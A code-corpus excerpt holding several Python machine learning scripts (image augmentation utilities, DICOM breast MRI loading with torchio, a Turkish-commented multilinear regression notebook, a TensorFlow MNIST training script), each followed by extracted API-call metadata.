'torch_backend.patches', 'patches', (['random_data'], {}), '(random_data)\n', (7315, 7328), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((7656, 7680), 'torch.cuda.synchronize', 'torch.cuda.synchronize', ([], {}), '()\n', (7678, 7680), False, 'import torch\n'), ((8715, 8737), 'torch_backend.cifar10', 'cifar10', (['args.data_dir'], {}), '(args.data_dir)\n', (8722, 8737), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((9683, 9719), 'torch.tensor', 'torch.tensor', (['x'], {'dtype': 'torch.float32'}), '(x, dtype=torch.float32)\n', (9695, 9719), False, 'import torch\n'), ((9817, 9865), 'functools.partial', 'partial', (['transpose'], {'source': '"""NHWC"""', 'target': '"""NCHW"""'}), "(transpose, source='NHWC', target='NCHW')\n", (9824, 9865), False, 'from functools import partial\n'), ((10003, 10052), 'torch_backend.patches', 'patches', (["train_set['data'][:10000, :, 4:-4, 4:-4]"], {}), "(train_set['data'][:10000, :, 4:-4, 4:-4])\n", (10010, 10052), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((9005, 9068), 'torchvision.transforms.RandomCrop', 'tv.transforms.RandomCrop', (['(32)'], {'padding': '(0)', 'padding_mode': '"""reflect"""'}), "(32, padding=0, padding_mode='reflect')\n", (9029, 9068), True, 'import torchvision as tv\n'), ((9078, 9119), 'torchvision.transforms.RandomHorizontalFlip', 'tv.transforms.RandomHorizontalFlip', ([], {'p': '(0.5)'}), '(p=0.5)\n', (9112, 9119), True, 'import torchvision as tv\n'), ((11814, 11856), 'core.union', 'union', (["{'time': train_time}", 'train_summary'], {}), "({'time': train_time}, train_summary)\n", (11819, 11856), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11879, 11919), 'core.union', 'union', (["{'time': test_time}", 'test_summary'], {}), "({'time': test_time}, test_summary)\n", (11884, 11919), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11996, 12024), 'core.union', 'union', (["{'epoch': epoch}", 'log'], {}), "({'epoch': epoch}, log)\n", (12001, 12024), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((1686, 1705), 'torch.sqrt', 'torch.sqrt', (['(Λ + eps)'], {}), '(Λ + eps)\n', (1696, 1705), False, 'import torch\n'), ((3269, 3284), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(4)'], {}), '(4)\n', (3281, 3284), True, 'import torch.nn as nn\n'), ((3298, 3307), 'torch_backend.Flatten', 'Flatten', ([], {}), '()\n', (3305, 3307), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((3321, 3360), 'torch.nn.Linear', 'nn.Linear', (['channels[-1]', '(10)'], {'bias': '(False)'}), '(channels[-1], 10, bias=False)\n', (3330, 3360), True, 'import torch.nn as nn\n'), ((3374, 3385), 'torch_backend.Mul', 'Mul', (['weight'], {}), '(weight)\n', (3377, 3385), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((7224, 7256), 'numpy.random.randn', 'np.random.randn', (['(1000)', '(3)', '(32)', '(32)'], {}), '(1000, 3, 32, 32)\n', (7239, 7256), True, 'import numpy as np\n'), ((9933, 9955), 'functools.partial', 'partial', (['pad'], {'border': '(4)'}), '(pad, border=4)\n', (9940, 9955), False, 'from functools import partial\n'), ((9957, 9980), 'torch_backend.to', 'to', ([], {'dtype': 'torch.float16'}), '(dtype=torch.float16)\n', (9959, 9980), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((10287, 10310), 'torch_backend.to', 'to', ([], {'dtype': 'torch.float16'}), '(dtype=torch.float16)\n', (10289, 10310), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((2104, 2156), 'torch.nn.Conv2d', 'nn.Conv2d', (['(27)', 'c_out'], {'kernel_size': '(1, 1)', 'bias': '(False)'}), '(27, c_out, kernel_size=(1, 1), bias=False)\n', (2113, 2156), True, 'import torch.nn as nn\n'), ((2178, 2234), 'torch_backend.GhostBatchNorm', 'GhostBatchNorm', (['c_out'], {'num_splits': '(16)', 'weight_freeze': '(True)'}), '(c_out, num_splits=16, weight_freeze=True)\n', (2192, 2234), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((2258, 2276), 'torch.nn.CELU', 'nn.CELU', ([], {'alpha': '(0.3)'}), '(alpha=0.3)\n', (2265, 2276), True, 'import torch.nn as nn\n'), ((7143, 7179), 'numpy.random.randint', 'np.random.randint', (['(0)', '(10)', 'batch_size'], {}), '(0, 10, batch_size)\n', (7160, 7179), True, 'import numpy as np\n'), ((10936, 10959), 'torch_backend.trainable_params', 'trainable_params', (['model'], {}), '(model)\n', (10952, 10959), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((7056, 7093), 'numpy.random.rand', 'np.random.rand', (['batch_size', '(3)', '(32)', '(32)'], {}), '(batch_size, 3, 32, 32)\n', (7070, 7093), True, 'import numpy as np\n')] |
import random
import torch
import torch.nn.functional as F
import numpy as np
from PIL import ImageOps, ImageEnhance, ImageFilter, Image
"""
For PIL.Image
"""
def autocontrast(x, *args, **kwargs):
return ImageOps.autocontrast(x.convert("RGB")).convert("RGBA")
def brightness(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
level = (level / magnitude) * max_level + 0.1
return ImageEnhance.Brightness(x).enhance(level)
def color(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
level = (level / magnitude) * max_level + 0.1
return ImageEnhance.Color(x).enhance(level)
def contrast(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
level = (level / magnitude) * max_level + 0.1
return ImageEnhance.Contrast(x).enhance(level)
def equalize(x, *args, **kwargs):
return ImageOps.equalize(x.convert("RGB")).convert("RGBA")
def identity(x, *args, **kwargs):
return x
def invert(x, *args, **kwargs):
return ImageOps.invert(x.convert("RGB")).convert("RGBA")
def posterize(x, level, magnitude=10, max_level=4, *args, **kwargs):
level = int((level / magnitude) * max_level)
return ImageOps.posterize(x.convert("RGB"), 4 - level).convert("RGBA")
def rotate(x, level, magnitude=10, max_level=30, *args, **kwargs):
degree = int((level / magnitude) * max_level)
if random.random() > 0.5:
degree = -degree
return x.rotate(degree)
def sharpness(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
level = (level / magnitude) * max_level + 0.1
return ImageEnhance.Sharpness(x).enhance(level)
def shear_x(x, level, magnitude=10, max_level=0.3, *args, **kwargs):
level = (level / magnitude) * max_level
if random.random() > 0.5:
level = -level
return x.transform(x.size, Image.AFFINE, (1, level, 0, 0, 1, 0))
def shear_y(x, level, magnitude=10, max_level=0.3, *args, **kwargs):
level = (level / magnitude) * max_level
if random.random() > 0.5:
level = -level
return x.transform(x.size, Image.AFFINE, (1, 0, 0, level, 1, 0))
def solarize(x, level, magnitude=10, max_level=256, *args, **kwargs):
level = int((level / magnitude) * max_level)
return ImageOps.solarize(x.convert("RGB"), 256 - level).convert("RGBA")
def translate_x(x, level, magnitude=10, max_level=10, *args, **kwargs):
level = int((level / magnitude) * max_level)
if random.random() > 0.5:
level = -level
return x.transform(x.size, Image.AFFINE, (1, 0, level, 0, 1, 0))
def translate_y(x, level, magnitude=10, max_level=10, *args, **kwargs):
level = int((level / magnitude) * max_level)
if random.random() > 0.5:
level = -level
return x.transform(x.size, Image.AFFINE, (1, 0, 0, 0, 1, level))
def cutout(x, level, magnitude=10, max_level=20, *args, **kwargs):
size = int((level / magnitude) * max_level)
if size <= 0:
return x
w, h = x.size
upper_coord, lower_coord = _gen_cutout_coord(h, w, size)
pixels = x.load()
for i in range(upper_coord[0], lower_coord[0]):
for j in range(upper_coord[1], lower_coord[1]):
pixels[i, j] = (127, 127, 127, 0)
return x
def _gen_cutout_coord(height, width, size):
height_loc = random.randint(0, height - 1)
width_loc = random.randint(0, width - 1)
upper_coord = (max(0, height_loc - size // 2),
max(0, width_loc - size // 2))
lower_coord = (min(height, height_loc + size // 2),
min(width, width_loc + size // 2))
return upper_coord, lower_coord
"""
For torch.Tensor
"""
class TorchCutout:
def __init__(self, size=16):
self.size = size
def __call__(self, img):
h, w = img.shape[-2:]
upper_coord, lower_coord = _gen_cutout_coord(h, w, self.size)
mask_height = lower_coord[0] - upper_coord[0]
mask_width = lower_coord[1] - upper_coord[1]
assert mask_height > 0
assert mask_width > 0
mask = torch.ones_like(img)
zeros = torch.zeros((img.shape[0], mask_height, mask_width))
mask[:, upper_coord[0]:lower_coord[0], upper_coord[1]:lower_coord[1]] = zeros
return img * mask
def __repr__(self):
return f"TorchCutout(size={self.size})"
class GaussianNoise:
def __init__(self, std=0.15):
self.std = std
def __call__(self, x):
with torch.no_grad():
return x + torch.randn_like(x) * self.std
def __repr__(self):
return f"GaussianNoise(std={self.std})"
class BatchRandomFlip:
def __init__(self, flip_prob=0.5):
self.p = flip_prob
def __call__(self, x):
with torch.no_grad():
return torch.stack([
torch.flip(img, (-1,))
if random.random() > self.p
else img
for img in x
], 0)
def __repr__(self):
return f"BatchRandomFlip(flip_prob={self.p})"
class RandomFlip:
def __init__(self, flip_prob=0.5):
self.p = flip_prob
def __call__(self, x):
if random.random() > self.p:
return torch.flip(x, (-1,))
return x
def __repr__(self):
return f"RandomFlip(flip_prob={self.p})"
class BatchRandomCrop:
def __init__(self, padding=4):
self.pad = padding
def __call__(self, x):
with torch.no_grad():
b, _, h, w = x.shape
x = F.pad(x, [self.pad for _ in range(4)], mode="reflect")
left, top = torch.randint(0, 1+self.pad*2, (b,)), torch.randint(0, 1+self.pad*2, (b,))
return torch.stack([
img[..., t:t+h, l:l+w]
for img, t, l in zip(x, left, top)
], 0)
def __repr__(self):
return f"BatchRandomCrop(padding={self.pad})"
class RandomCrop:
def __init__(self, padding=4):
self.pad = padding
def __call__(self, x):
with torch.no_grad():
_, h, w = x.shape
x = F.pad(x[None], [self.pad for _ in range(4)], mode="reflect")
left, top = random.randint(0, self.pad*2), random.randint(0, self.pad*2)
return x[0, :, top:top+h, left:left+w]
def __repr__(self):
return f"RandomCrop(padding={self.pad})"
class ZCA:
def __init__(self, mean, scale):
self.mean = torch.from_numpy(mean).float()
self.scale = torch.from_numpy(scale).float()
def __call__(self, x):
c, h, w = x.shape
x = x.reshape(-1)
x = (x - self.mean) @ self.scale
return x.reshape(c, h, w)
def __repr__(self):
return f"ZCA()"
class GCN:
"""global contrast normalization"""
def __init__(self, multiplier=55, eps=1e-10):
self.multiplier = multiplier
self.eps = eps
def __call__(self, x):
x -= x.mean()
norm = x.norm(2)
norm[norm < self.eps] = 1
return self.multiplier * x / norm
def __repr__(self):
return f"GCN(multiplier={self.multiplier}, eps={self.eps})"
"""
For numpy.array
"""
def numpy_batch_gcn(images, multiplier=55, eps=1e-10):
# global contrast normalization
images = images.astype(np.float)
images -= images.mean(axis=(1,2,3), keepdims=True)
per_image_norm = np.sqrt(np.square(images).sum((1,2,3), keepdims=True))
per_image_norm[per_image_norm < eps] = 1
return multiplier * images / per_image_norm
| [
"torch.ones_like",
"torch.flip",
"PIL.ImageEnhance.Brightness",
"torch.randint",
"random.randint",
"torch.randn_like",
"PIL.ImageEnhance.Color",
"numpy.square",
"PIL.ImageEnhance.Contrast",
"random.random",
"PIL.ImageEnhance.Sharpness",
"torch.zeros",
"torch.no_grad",
"torch.from_numpy"
] | [((3245, 3274), 'random.randint', 'random.randint', (['(0)', '(height - 1)'], {}), '(0, height - 1)\n', (3259, 3274), False, 'import random\n'), ((3291, 3319), 'random.randint', 'random.randint', (['(0)', '(width - 1)'], {}), '(0, width - 1)\n', (3305, 3319), False, 'import random\n'), ((1349, 1364), 'random.random', 'random.random', ([], {}), '()\n', (1362, 1364), False, 'import random\n'), ((1722, 1737), 'random.random', 'random.random', ([], {}), '()\n', (1735, 1737), False, 'import random\n'), ((1959, 1974), 'random.random', 'random.random', ([], {}), '()\n', (1972, 1974), False, 'import random\n'), ((2401, 2416), 'random.random', 'random.random', ([], {}), '()\n', (2414, 2416), False, 'import random\n'), ((2646, 2661), 'random.random', 'random.random', ([], {}), '()\n', (2659, 2661), False, 'import random\n'), ((3991, 4011), 'torch.ones_like', 'torch.ones_like', (['img'], {}), '(img)\n', (4006, 4011), False, 'import torch\n'), ((4028, 4080), 'torch.zeros', 'torch.zeros', (['(img.shape[0], mask_height, mask_width)'], {}), '((img.shape[0], mask_height, mask_width))\n', (4039, 4080), False, 'import torch\n'), ((403, 429), 'PIL.ImageEnhance.Brightness', 'ImageEnhance.Brightness', (['x'], {}), '(x)\n', (426, 429), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((575, 596), 'PIL.ImageEnhance.Color', 'ImageEnhance.Color', (['x'], {}), '(x)\n', (593, 596), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((745, 769), 'PIL.ImageEnhance.Contrast', 'ImageEnhance.Contrast', (['x'], {}), '(x)\n', (766, 769), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((1559, 1584), 'PIL.ImageEnhance.Sharpness', 'ImageEnhance.Sharpness', (['x'], {}), '(x)\n', (1581, 1584), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((4387, 4402), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4400, 4402), False, 'import torch\n'), ((4663, 4678), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4676, 4678), False, 'import torch\n'), ((5072, 5087), 'random.random', 'random.random', ([], {}), '()\n', (5085, 5087), False, 'import random\n'), ((5117, 5137), 'torch.flip', 'torch.flip', (['x', '(-1,)'], {}), '(x, (-1,))\n', (5127, 5137), False, 'import torch\n'), ((5357, 5372), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5370, 5372), False, 'import torch\n'), ((5920, 5935), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5933, 5935), False, 'import torch\n'), ((5502, 5542), 'torch.randint', 'torch.randint', (['(0)', '(1 + self.pad * 2)', '(b,)'], {}), '(0, 1 + self.pad * 2, (b,))\n', (5515, 5542), False, 'import torch\n'), ((5540, 5580), 'torch.randint', 'torch.randint', (['(0)', '(1 + self.pad * 2)', '(b,)'], {}), '(0, 1 + self.pad * 2, (b,))\n', (5553, 5580), False, 'import torch\n'), ((6068, 6099), 'random.randint', 'random.randint', (['(0)', '(self.pad * 2)'], {}), '(0, self.pad * 2)\n', (6082, 6099), False, 'import random\n'), ((6099, 6130), 'random.randint', 'random.randint', (['(0)', '(self.pad * 2)'], {}), '(0, self.pad * 2)\n', (6113, 6130), False, 'import random\n'), ((6324, 6346), 'torch.from_numpy', 'torch.from_numpy', (['mean'], {}), '(mean)\n', (6340, 6346), False, 'import torch\n'), ((6376, 6399), 'torch.from_numpy', 'torch.from_numpy', (['scale'], {}), '(scale)\n', (6392, 6399), False, 'import torch\n'), ((7257, 7274), 'numpy.square', 'np.square', (['images'], {}), '(images)\n', (7266, 7274), True, 'import numpy as np\n'), ((4427, 4446), 'torch.randn_like', 'torch.randn_like', (['x'], {}), '(x)\n', (4443, 4446), False, 'import torch\n'), ((4729, 4751), 'torch.flip', 'torch.flip', (['img', '(-1,)'], {}), '(img, (-1,))\n', (4739, 4751), False, 'import torch\n'), ((4771, 4786), 'random.random', 'random.random', ([], {}), '()\n', (4784, 4786), False, 'import random\n')] |
import torchio
import os
import numpy as np
import pydicom as dicom
import time
import torch
import random
import math
import tensorflow as tf
prev_time = time.time()
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
imgs_shape = (512, 512)
crop_shape = (128, 128)
load_dir = 'C:/Users/trist/cs_projects/Cancer_Project/Cancer Imagery/manifest-1621548522717/Duke-Breast-Cancer-MRI'
load_paths = list()
for (dirpath, dirnames, filenames) in os.walk(load_dir):
load_paths += [os.path.join(dirpath, file) for file in filenames]
# get random subset of list
percent_sample = 100
total_imgs = len(load_paths) * (percent_sample*0.01)
# round down
total_imgs = math.floor(total_imgs)
new_path_list = []
i = 0
while i < total_imgs:
rand_choice = random.choice(load_paths)
if rand_choice not in new_path_list:
new_path_list.append(rand_choice)
i = i + 1
load_paths = new_path_list
img_list = []
for path in load_paths:
try:
img = dicom.dcmread(path)
img_shape = img.pixel_array.shape
id = img.PatientID
if img_shape == imgs_shape:
for c in id:
if not c.isdigit():
id = id.replace(c, '')
subject_dict = {
'one image': torchio.ScalarImage(path),
'id': id
}
subject = torchio.Subject(subject_dict)
img_list.append(subject)
except:
print('image ' + str(path) + ' could not be loaded')
dataset = torchio.SubjectsDataset(img_list)
print('Total length of dataset: ' + str(len(dataset)))
device = torch.device("cpu")
img_array = np.empty(shape=(len(dataset), (crop_shape[0]*crop_shape[1])+1), dtype=np.int8)
for i in range(len(dataset)):
loader = torch.utils.data.DataLoader(dataset, shuffle=True)
id = torch.tensor([int(next(iter(loader))['id'][0])])
image = next(iter(loader))['one image']['data']
image = image.numpy()
# crop image
image = tf.image.random_crop(value=image, size=(1, 1, crop_shape[0], crop_shape[1], 1))
image = image.numpy()
image = image.flatten()
image = np.append(image, id)
img_array[i] = image
np.save('converted_imgs/img_array.npy', img_array)
after_time = time.time()
load_time = after_time - prev_time
print(load_time)
| [
"tensorflow.image.random_crop",
"pydicom.dcmread",
"numpy.save",
"torch.utils.data.DataLoader",
"os.walk",
"math.floor",
"random.choice",
"torchio.SubjectsDataset",
"time.time",
"torchio.Subject",
"numpy.append",
"torchio.ScalarImage",
"torch.device",
"os.path.join"
] | [((156, 167), 'time.time', 'time.time', ([], {}), '()\n', (165, 167), False, 'import time\n'), ((436, 453), 'os.walk', 'os.walk', (['load_dir'], {}), '(load_dir)\n', (443, 453), False, 'import os\n'), ((655, 677), 'math.floor', 'math.floor', (['total_imgs'], {}), '(total_imgs)\n', (665, 677), False, 'import math\n'), ((1495, 1528), 'torchio.SubjectsDataset', 'torchio.SubjectsDataset', (['img_list'], {}), '(img_list)\n', (1518, 1528), False, 'import torchio\n'), ((1594, 1613), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1606, 1613), False, 'import torch\n'), ((2167, 2217), 'numpy.save', 'np.save', (['"""converted_imgs/img_array.npy"""', 'img_array'], {}), "('converted_imgs/img_array.npy', img_array)\n", (2174, 2217), True, 'import numpy as np\n'), ((2232, 2243), 'time.time', 'time.time', ([], {}), '()\n', (2241, 2243), False, 'import time\n'), ((744, 769), 'random.choice', 'random.choice', (['load_paths'], {}), '(load_paths)\n', (757, 769), False, 'import random\n'), ((1751, 1801), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'shuffle': '(True)'}), '(dataset, shuffle=True)\n', (1778, 1801), False, 'import torch\n'), ((1970, 2049), 'tensorflow.image.random_crop', 'tf.image.random_crop', ([], {'value': 'image', 'size': '(1, 1, crop_shape[0], crop_shape[1], 1)'}), '(value=image, size=(1, 1, crop_shape[0], crop_shape[1], 1))\n', (1990, 2049), True, 'import tensorflow as tf\n'), ((2119, 2139), 'numpy.append', 'np.append', (['image', 'id'], {}), '(image, id)\n', (2128, 2139), True, 'import numpy as np\n'), ((474, 501), 'os.path.join', 'os.path.join', (['dirpath', 'file'], {}), '(dirpath, file)\n', (486, 501), False, 'import os\n'), ((964, 983), 'pydicom.dcmread', 'dicom.dcmread', (['path'], {}), '(path)\n', (977, 983), True, 'import pydicom as dicom\n'), ((1342, 1371), 'torchio.Subject', 'torchio.Subject', (['subject_dict'], {}), '(subject_dict)\n', (1357, 1371), False, 'import torchio\n'), ((1253, 1278), 'torchio.ScalarImage', 'torchio.ScalarImage', (['path'], {}), '(path)\n', (1272, 1278), False, 'import torchio\n')] |
# -*- coding: utf-8 -*-
"""multilinearRegression.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1OSTS53kURF8OctaWn6l88Wlur2FKP2sp
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
veriler = pd.read_csv('/content/veriler.csv')
ulke = veriler.iloc[:,0:1].values
sayisalVeriler = veriler.iloc[:, 1:4]
c = veriler.iloc[:, 4:5].values
c
from sklearn import preprocessing
le = preprocessing.LabelEncoder()
c[:, 0] = le.fit_transform(veriler.iloc[:, -1])
ulke[:, 0] = le.fit_transform(veriler.iloc[:, 0:1])
ohe = preprocessing.OneHotEncoder()
c = ohe.fit_transform(c).toarray()
ulke = ohe.fit_transform(ulke).toarray()
sonuc1 = pd.DataFrame(data=ulke, index=range(len(ulke)), columns=['fr', 'tr', 'us'])
sonuc2 = pd.DataFrame(data=sayisalVeriler, index=range(len(sayisalVeriler)), columns= ['boy', 'kilo', 'yas'])
sCin = pd.DataFrame(data=c[:, 0:1], index = range(len(c[:, 0:1])), columns = ['Cinsiyet'])
s1 = pd.concat([sonuc1, sonuc2], axis=1) # satir satira birlestirmek icin yani yatay boyutta birlestirmek icin axis = 1
s2 = pd.concat([s1, sCin], axis=1)
s2
from sklearn.model_selection import train_test_split
# verinin yuzde 66 si antrenman icin kullanilsin kalan yuzde 33'u test edilsin diye ayrdik
# random_state rastsal ayirma icin kullaniliyor ayni degeri alan her kod ayni ayrimi yapar
x_train, x_test, y_train, y_test = train_test_split(s1, sCin, test_size = 0.33, random_state = 0)
x_train
y_train
x_test
y_test
from sklearn.linear_model import LinearRegression
multile = LinearRegression()
multile.fit(x_train, y_train)
y_predict = multile.predict(x_test)
y_test.values
y_predict
boy = s2.iloc[:, 3:4].values
sol = s2.iloc[:,:3]
sag = s2.iloc[:,4:]
yeniVeriler = pd.concat([sol, sag], axis = 1)
yeniVeriler
x_train, x_test, y_train, y_test = train_test_split(yeniVeriler, boy, test_size = 0.33, random_state = 0)
multile2 = LinearRegression()
multile2.fit(x_train, y_train)
y_predict2 = multile2.predict(x_test)
y_predict2
y_test
"""Multilineer regresyoda ki B0 degerini 1 olarak ```yeniVerilerin``` basina ekledik. Bunuda ```X```'e attik."""
X = np.append(arr = np.ones((22,1)).astype(int), values = yeniVeriler, axis = 1)
X
"""# Backward Elimination Algorithm
> Bu algoritma oneNotaki notalara bakarak nalasilabilir.
> Kisaca OLS raporundan aldigimiz olasik degerlerine bakarak ve Backward Elimination algoritmasina dayanarak 0.05 aldigimiz P degerinden yuksek degerleri sirasiyla kontrol ederek eliyoruz ta ki P < 0.05 olana kadar.
> Burada boy bagimli degisken ve bagimsiz degiskenleri ```yeniVeriler``` tablosundan cekip 0.05 den buyuk olanlari eledik.
"""
import statsmodels.api as sm
X_1 = yeniVeriler.iloc[:, [0, 1, 2, 3, 4, 5]].values
X_1 = np.array(X_1, dtype = float)
model = sm.OLS(boy, X_1).fit()
model.summary()
X_1 = yeniVeriler.iloc[:, [0, 1, 2, 3, 5]].values
X_1 = np.array(X_1, dtype = float)
model = sm.OLS(boy, X_1).fit()
model.summary()
X_1 = yeniVeriler.iloc[:, [0, 1, 2, 3]].values
X_1 = np.array(X_1, dtype = float)
model = sm.OLS(boy, X_1).fit()
model.summary()
| [
"statsmodels.api.OLS",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.preprocessing.OneHotEncoder",
"numpy.ones",
"sklearn.preprocessing.LabelEncoder",
"sklearn.linear_model.LinearRegression",
"numpy.array",
"pandas.concat"
] | [((291, 326), 'pandas.read_csv', 'pd.read_csv', (['"""/content/veriler.csv"""'], {}), "('/content/veriler.csv')\n", (302, 326), True, 'import pandas as pd\n'), ((477, 505), 'sklearn.preprocessing.LabelEncoder', 'preprocessing.LabelEncoder', ([], {}), '()\n', (503, 505), False, 'from sklearn import preprocessing\n'), ((615, 644), 'sklearn.preprocessing.OneHotEncoder', 'preprocessing.OneHotEncoder', ([], {}), '()\n', (642, 644), False, 'from sklearn import preprocessing\n'), ((1018, 1053), 'pandas.concat', 'pd.concat', (['[sonuc1, sonuc2]'], {'axis': '(1)'}), '([sonuc1, sonuc2], axis=1)\n', (1027, 1053), True, 'import pandas as pd\n'), ((1139, 1168), 'pandas.concat', 'pd.concat', (['[s1, sCin]'], {'axis': '(1)'}), '([s1, sCin], axis=1)\n', (1148, 1168), True, 'import pandas as pd\n'), ((1445, 1503), 'sklearn.model_selection.train_test_split', 'train_test_split', (['s1', 'sCin'], {'test_size': '(0.33)', 'random_state': '(0)'}), '(s1, sCin, test_size=0.33, random_state=0)\n', (1461, 1503), False, 'from sklearn.model_selection import train_test_split\n'), ((1604, 1622), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (1620, 1622), False, 'from sklearn.linear_model import LinearRegression\n'), ((1804, 1833), 'pandas.concat', 'pd.concat', (['[sol, sag]'], {'axis': '(1)'}), '([sol, sag], axis=1)\n', (1813, 1833), True, 'import pandas as pd\n'), ((1885, 1951), 'sklearn.model_selection.train_test_split', 'train_test_split', (['yeniVeriler', 'boy'], {'test_size': '(0.33)', 'random_state': '(0)'}), '(yeniVeriler, boy, test_size=0.33, random_state=0)\n', (1901, 1951), False, 'from sklearn.model_selection import train_test_split\n'), ((1968, 1986), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (1984, 1986), False, 'from sklearn.linear_model import LinearRegression\n'), ((2810, 2836), 'numpy.array', 'np.array', (['X_1'], {'dtype': 'float'}), '(X_1, dtype=float)\n', (2818, 2836), True, 'import numpy as np\n'), ((2946, 2972), 'numpy.array', 'np.array', (['X_1'], {'dtype': 'float'}), '(X_1, dtype=float)\n', (2954, 2972), True, 'import numpy as np\n'), ((3079, 3105), 'numpy.array', 'np.array', (['X_1'], {'dtype': 'float'}), '(X_1, dtype=float)\n', (3087, 3105), True, 'import numpy as np\n'), ((2848, 2864), 'statsmodels.api.OLS', 'sm.OLS', (['boy', 'X_1'], {}), '(boy, X_1)\n', (2854, 2864), True, 'import statsmodels.api as sm\n'), ((2984, 3000), 'statsmodels.api.OLS', 'sm.OLS', (['boy', 'X_1'], {}), '(boy, X_1)\n', (2990, 3000), True, 'import statsmodels.api as sm\n'), ((3117, 3133), 'statsmodels.api.OLS', 'sm.OLS', (['boy', 'X_1'], {}), '(boy, X_1)\n', (3123, 3133), True, 'import statsmodels.api as sm\n'), ((2213, 2229), 'numpy.ones', 'np.ones', (['(22, 1)'], {}), '((22, 1))\n', (2220, 2229), True, 'import numpy as np\n')] |
import tensorflow as tf
import numpy as np
import os
import time
from tensorflow.contrib.tensorboard.plugins import projector
slim = tf.contrib.slim
from MNIST_Classification_with_embedding import Classification_Model
from tensorflow.examples.tutorials.mnist import input_data
def main(_):
tf.logging.set_verbosity(tf.logging.DEBUG)
tfrecords_path = './data_tf/'
iteration = 50000
with tf.Graph().as_default():
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
is_training = tf.placeholder(tf.bool)
ckpt = tf.train.get_checkpoint_state(os.path.dirname('./checkpoint_pretrain/checkpoint'))
sess = tf.InteractiveSession()
global_step = slim.create_global_step()
summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
mnist_net = Classification_Model()
x,y_ = mnist_net.get_batch_tf(tfrecords_path)
# x = tf.placeholder(tf.float32, [None, 28, 28, 1], name='x-input')
# y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')
# arg_scope = mnist_net.model_arg_scope()
end_points = {}
# with slim.arg_scope(arg_scope):
logits, end_points = mnist_net.net(x, is_training = is_training, reuse = None)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
losses = mnist_net.losses(logits, y_)
train_step = mnist_net.optimizer(0.001).minimize(losses, global_step=global_step)
embedding, config = mnist_net.get_embedding('./checkpoint_pretrain/')
#total_loss = tf.losses.get_total_loss()
summaries.add(tf.summary.image("img", tf.cast(x, tf.float32)))
summaries.add(tf.summary.scalar('loss', losses))
for variable in tf.trainable_variables():
summaries.add(tf.summary.histogram(variable.op.name, variable))
train_writer = tf.summary.FileWriter('./checkpoint_pretrain/',
sess.graph)
projector.visualize_embeddings(train_writer, config)
correct_prediction = tf.equal(tf.argmax(end_points['Predictions'], 1), tf.argmax(y_, 1))
train_num_correct = tf.reduce_sum(tf.cast(correct_prediction, tf.float32))
accuracy = train_num_correct / mnist_net.batch_size
#accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
summaries.add(tf.summary.scalar('accuracy', accuracy))
summary_op = tf.summary.merge(list(summaries), name='summary_op')
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
saver = tf.train.Saver(max_to_keep=5,
keep_checkpoint_every_n_hours=1.0,
write_version=2,
pad_step_number=False)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
x_test = tf.placeholder(tf.float32, shape=[None, 28, 28, 1])
